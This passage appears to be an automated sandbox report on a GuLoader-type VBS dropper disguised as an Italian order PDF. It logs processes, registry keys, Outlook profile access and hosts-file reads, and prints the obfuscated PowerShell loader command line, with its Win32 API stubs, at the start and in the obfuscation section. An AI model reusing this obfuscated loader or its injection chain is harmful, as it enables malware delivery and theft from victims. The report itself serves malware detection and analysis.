NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D2AAAB6 AdjustTokenPrivileges, 17_2_1D2AAAB6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_1D2AAA7F AdjustTokenPrivileges, 17_2_1D2AAA7F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cooiigyo.4mo.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@13/10@3/3
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_01
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll Jump to behavior
Source: Binary string: l;C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.pdb source: powershell.exe, 00000003.00000002.601070377.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Necrological\Ignoreringers\Skifret", "6wJcQOsCOQG60O6XBOsCm9txAZuB6hLiwCxxAZtxAZuBwj60KijrAptvcQGb6wLsresCgvjr", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Skoleeksempel = """SmADrdZodSy-CoTbl", "", "", "0")
Yara detected GuLoader
Source: Yara match File source: 00000011.00000000.507338046.0000000000F20000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_200F1288 push ss; iretd 17_2_200F1289
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_201058B0 push 0000001Fh; ret 17_2_20105960
Compiles C# or VB.Net code
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline Jump to behavior
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
